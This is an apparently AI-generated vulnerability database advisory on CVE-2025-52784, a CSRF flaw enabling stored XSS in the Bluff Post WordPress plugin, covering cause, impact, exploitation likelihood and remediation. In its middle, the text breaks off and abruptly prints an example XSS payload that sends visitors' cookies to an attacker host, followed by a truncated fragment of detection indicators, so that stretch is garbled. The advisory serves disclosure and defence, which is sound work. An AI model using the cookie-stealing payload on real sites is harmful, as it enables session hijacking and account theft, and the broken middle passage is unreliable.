
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-52784 is a Cross-Site Request Forgery (CSRF) vulnerability in the Bluff Post WordPress plugin (developed by hideoguchi) that enables Stored Cross-Site Scripting (XSS). All versions up to and including 1.1.1 are affected. The vulnerability was published on June 20, 2025, and carries a CVSS v3.1 base score of 7.1 (High) (Feedly).
The root cause is insufficient or absent CSRF token validation on plugin endpoints, classified as CWE-352 (Cross-Site Request Forgery). An attacker can craft a malicious web page or link that, when visited by an authenticated WordPress user, silently submits a forged request to the plugin's administrative functionality, injecting persistent (stored) XSS payloads into the site's database. Because the scope is changed (S:C in the CVSS vector), the injected script can affect users and contexts beyond the originating request, such as site visitors who later view the poisoned content (Feedly).
Successful exploitation allows an attacker to persistently inject arbitrary JavaScript into the WordPress site, which executes in the browsers of any user who views the affected content. This can lead to session hijacking, credential theft, defacement, redirection to malicious sites, or further compromise of site visitors. The CVSS assessment indicates low-level impacts across confidentiality, integrity, and availability, but the stored nature of the XSS amplifies the reach beyond the initially targeted administrator (Feedly).
No public proof-of-concept exploit code or evidence of active in-the-wild exploitation has been reported for CVE-2025-52784. The EPSS score is approximately 0.015%, indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires user interaction — specifically, an authenticated WordPress user must be tricked into visiting a malicious page (Feedly).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>).<script>, onerror=, javascript:) stored in post content, plugin settings, or custom fields associated with the Bluff Post plugin.The primary remediation is to update or remove the Bluff Post plugin. As of the vulnerability disclosure date (June 20, 2025), version 1.1.1 is the last known affected version; site administrators should check the WordPress plugin repository for a patched release and upgrade immediately. If no patched version is available, the recommended workaround is to deactivate and delete the plugin until a fix is released. Additionally, implementing a Web Application Firewall (WAF) with CSRF and XSS rules (e.g., Wordfence, Patchstack) can provide interim protection (Feedly, Wordfence).
Wordfence included CVE-2025-52784 in its weekly WordPress vulnerability report for the period of June 16–22, 2025, noting it as part of a broader set of plugin vulnerabilities disclosed that week (Wordfence). No significant independent researcher commentary or broader media coverage has been identified for this vulnerability.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."